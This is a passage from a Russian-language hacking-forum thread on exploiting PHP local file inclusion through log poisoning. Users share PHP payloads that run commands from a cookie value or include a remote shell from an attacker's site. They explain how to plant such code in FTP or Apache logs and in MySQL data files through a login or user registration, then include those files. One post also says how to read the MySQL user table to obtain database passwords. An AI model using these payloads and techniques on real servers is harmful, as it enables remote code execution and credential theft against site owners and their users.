HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 06.07.2007, 17:59
Ni0x
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
С нами: 10370602

Репутация: 472
По умолчанию

Цитата:
Можно тут по подробней для такого инклуда нужно найти бажный скрипт?
да, локальный инклуд.
 
Ответить с цитированием

  #12  
Старый 06.07.2007, 18:06
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Цитата:
и как это выполнять команды и куков?
забей на куки
вместо
<? system($_COOKIE[cmd]);?>
посылай
<? include('http://твой_сайт.ru/shell.php'); ?>
 
Ответить с цитированием

  #13  
Старый 06.07.2007, 18:52
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

Не обязательно лог апача =))) разве в системе есть только они? )
А какже логи фтп сервера ? ) пути к которым можно узнать из их кфг файла. Тоесть опять же. мы логинимся с логином
Цитата:
<? include('http://твой_сайт.ru/shell.php'); ?>
а затем инклудим еррор лог от стоящего фтпшника.. (ну или акцеслог).. вообще бываает что запись идет в оба. (Именно логин а непасс, т.к. Пасс даже не коректный НЕ показывается в логах)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #14  
Старый 07.07.2007, 10:11
Dread
Познающий
Регистрация: 04.12.2005
Сообщений: 31
С нами: 10753767

Репутация: 5
По умолчанию

Цитата:
Сообщение от Spyder  
забей на куки
вместо
<? system($_COOKIE[cmd]);?>
посылай
<? include('http://твой_сайт.ru/shell.php'); ?>
я думаю там проканает только локальный инклуд! из вне наврятли!
 
Ответить с цитированием

  #15  
Старый 07.07.2007, 14:12
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
С нами: 9989667

Репутация: 240
По умолчанию

2 Dread
А ты лучше ну думай, а посмотри в phpinfo() директиву allow_url_fopen, и будешь знать навернека.
 
Ответить с цитированием

  #16  
Старый 08.07.2007, 15:45
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

Цитата:
я думаю там проканает только локальный инклуд! из вне наврятли!
наркоманы наступают =)) при чем тут это )))

Great: да не то слово просто =\
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

Последний раз редактировалось _Great_; 08.07.2007 в 15:50..
 
Ответить с цитированием

  #17  
Старый 17.09.2010, 02:32
TaveL
Новичок
Регистрация: 05.03.2009
Сообщений: 2
С нами: 9045729

Репутация: 0
По умолчанию

Пардон за некрофилию, но вопрос встал ребром:

что делать, если и access.log и error.log такого большого размера, что в память php не влазят (> 8 Мб)? и система win, так что /proc/self/environ не поюзать
 
Ответить с цитированием

  #18  
Старый 17.09.2010, 03:53
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

искать другие файлы, в которые можно записать инфу и инклюдить
 
Ответить с цитированием

  #19  
Старый 17.09.2010, 13:49
TaveL
Новичок
Регистрация: 05.03.2009
Сообщений: 2
С нами: 9045729

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
искать другие файлы, в которые можно записать инфу и инклюдить
это понятно, ты бы хоть намекнул какие это могут быть файлы. можно в лс.
 
Ответить с цитированием

  #20  
Старый 18.09.2010, 02:23
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
С нами: 8771234

Репутация: 23
По умолчанию

Можешь попробывать подинклудить файл базы данных.

C:/program files/mysql5.0.45/data/mysql

К примеру на сайте зарегистрировать пользователя и в регистрационных данных указать

Цитата:
Сообщение от None  

которые в последствии запишутся в бд.

Допустим shema_name(site) и table_name(users).

Тогда данный php код будет находится

Цитата:
Сообщение от None  
C://program files/mysql5.0.45/data/site/users.MYD
Естественно версия мускула в пути будет твоя.

После этого можешь попытаться подинклудить php код.

PS.

Таким же образом можно прочитать мускульные пароли пользователей.

Цитата:
Сообщение от None  
C://program files/mysql5.0.45/data/mysql/user.MYD
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...